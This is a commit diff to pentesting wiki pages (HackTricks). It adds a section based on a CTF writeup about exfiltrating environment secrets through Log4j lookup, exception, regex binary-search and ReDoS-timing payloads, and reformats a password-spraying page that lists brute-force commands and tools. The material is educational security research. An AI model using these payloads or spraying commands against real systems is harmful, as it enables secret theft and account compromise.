GitBook: [#3354] No subject

backdoors/salseo.md

@@ -26,7 +26,7 @@ You can **select the architecture** inside Visual Studio in the **left "Build" T
 
 (\*\*If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
 
-![](../.gitbook/assets/image.png)
+![](<../.gitbook/assets/image (132).png>)
 
 Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
 
@@ -109,7 +109,7 @@ Open the SalseoLoader project using Visual Studio.
 
 #### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
 
-![](<../.gitbook/assets/image (3).png>)
+![](<../.gitbook/assets/image (3) (1).png>)
 
 #### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
 

pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md

@@ -390,6 +390,66 @@ ${${lower:jnd}${lower:${upper:ı}}:ldap://...} //Notice the unicode "i"
 * [**https://github.com/leonjza/log4jpwn**](https://github.com/leonjza/log4jpwn)
 * [**https://github.com/christophetd/log4shell-vulnerable-app**](https://github.com/christophetd/log4shell-vulnerable-app)
 
+## Post-Log4Shell Exploitation
+
+In this [**CTF writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/) is well explained how it's potentially **possible** to **abuse** some features of **Log4J**.
+
+The [**security page**](https://logging.apache.org/log4j/2.x/security.html) **** of Log4j has some interesting sentences:
+
+> From version 2.16.0 (for Java 8), the **message lookups feature has been completely removed**. **Lookups in configuration still work**. Furthermore, Log4j now disables access to JNDI by default. JNDI lookups in configuration now need to be enabled explicitly.
+
+> From version 2.17.0, (and 2.12.3 and 2.3.1 for Java 7 and Java 6), **only lookup strings in configuration are expanded recursively**; in any other usage, only the top-level lookup is resolved, and any nested lookups are not resolved.
+
+This means that by default you can **forget using any `jndi` exploit**. Moreover, to perform **recursive lookups** you need to have them configure.
+
+For example, in that CTF this was configured in the file log4j2.xml:
+
+```xml
+<Console name="Console" target="SYSTEM_ERR">
+    <PatternLayout pattern="%d{HH:mm:ss.SSS} %-5level %logger{36} executing ${sys:cmd} - %msg %n">
+    </PatternLayout>
+</Console>
+```
+
+#### Env Lookups
+
+In this CTF the attacker controlled the value of `${sys:cmd}` and needed to exfiltrate the flag from an environment variable.\
+As seen in this page in [**previous payloads**](jndi-java-naming-and-directory-interface-and-log4shell.md#verification) there are different some ways to access env variables, such as: **`${env:FLAG}`**. In this CTF this was useless but it might not be in other real life scenarios.
+
+#### Exfiltration in Exceptions
+
+In the CTF, you **couldn't access the stderr** of the java application using log4J, but Log4J **exceptions are sent to stdout**, which was printed in the python app. This meant that triggering an exception we could access the content. An exception to exfiltrate the flag was: **`${java:${env:FLAG}}`.** This works because **`${java:CTF{blahblah}}`** doesn't exist and an exception with the value of the flag will be shown:
+
+![](../../.gitbook/assets/image.png)
+
+#### Conversion Patterns Exceptions
+
+Just to mention it, you could also inject new [**conversion patterns**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) and trigger exceptions that will be logged to `stdout`. For example:
+
+![](<../../.gitbook/assets/image (3).png>)
+
+This wasn't found useful to exfiltrate date inside the error message, because the lookup wasn't solved before the conversion pattern, but it could be useful for other stuff such as detecting.
+
+#### Conversion Patterns Regexes
+
+However, it's possible to use some **conversion patterns that supports regexes** to exfiltrate information from a lookup by using regexes and abusing **binary search** or **time based** behaviours.
+
+* **Binary search via exception messages**
+
+The conversion pattern **`%replace`** can be use to **replace** **content** from a **string** even using **regexes**. It works like this: `replace{pattern}{regex}{substitution}`\
+``Abusing this behaviour you could make replace **trigger an exception if the regex matched** anything inside the string (and no exception if it wasn't found) like this:
+
+```bash
+%replace{${env:FLAG}}{^CTF.*}{${error}}
+# The string searched is the env FLAG, the regex searched is ^CTF.*
+## and ONLY if it's found ${error} will be resolved with will trigger an exception
+```
+
+* **Time based**
+
+As it was mentioned in the previous section, **`%replace`** supports **regexes**. So it's possible to use payload from the [**ReDoS page**](../regular-expression-denial-of-service-redos.md) to cause a **timeout** in case the flag is found.\
+For example, a payload like `%replace{${env:FLAG}}{^(?=CTF)((.`_`)`_`)*salt$}{asd}` would trigger a **timeout** in that CTF.
+
 ## References
 
 * [https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/](https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/)

windows-hardening/active-directory-methodology/password-spraying.md

@@ -1,4 +1,4 @@
-
+# Password Spraying
 
 <details>
 
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
-# **Password Spraying**
+## **Password Spraying**
 
 Once you have found several **valid usernames** you can try the most **common passwords** (keep in mind the password policy of the environment) with each of the discovered users.\
 By **default** the **minimum** **password** **length** is **7**.
@@ -26,7 +25,7 @@ Lists of common usernames could also be useful: [https://github.com/insidetrust/
 
 Notice that you **could lockout some accounts if you try several wrong passwords** (by default more than 10).
 
-## Get password policy
+### Get password policy
 
 If you have some user credentials or a shell as a domain user you can get the password policy with:
 
@@ -34,7 +33,7 @@ If you have some user credentials or a shell as a domain user you can get the pa
 * `enum4linx -u 'username' -p 'password' -P <IP>`
 * `(Get-DomainPolicy)."SystemAccess" #From powerview`
 
-## Exploitation
+### Exploitation
 
 Using **crackmapexec:**
 
@@ -70,7 +69,7 @@ With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
 
 With the `scanner/smb/smb_login` module of Metasploit:
 
-![](<../../.gitbook/assets/image (132).png>)
+![](<../../.gitbook/assets/image (132) (1).png>)
 
 With [Invoke-DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1)
 
@@ -80,7 +79,7 @@ Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
 
 or **spray** (read next section).
 
-## Lockout check
+### Lockout check
 
 The best way is not to try with more than 5/7 passwords per account.
 
@@ -90,12 +89,12 @@ So you have to be very careful with password spraying because you could lockout
 spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
 ```
 
-# Outlook Web Access
+## Outlook Web Access
 
 There are multiples tools for password spraying outlook.
 
-* With [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
-* with [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
+* With [MSF Owa\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_login/)
+* with [MSF Owa\_ews\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_ews\_login/)
 * With [Ruler](https://github.com/sensepost/ruler) (reliable!)
 * With [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
 * With [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
@@ -121,14 +120,13 @@ $ ./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords pass
     [+] Success: S.SVENSSON:Summer2020
 ```
 
-# References :
+## References :
 
 * [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
 * [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
 * www.blackhillsinfosec.com/?p=5296
 * [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying)
 
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -144,5 +142,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-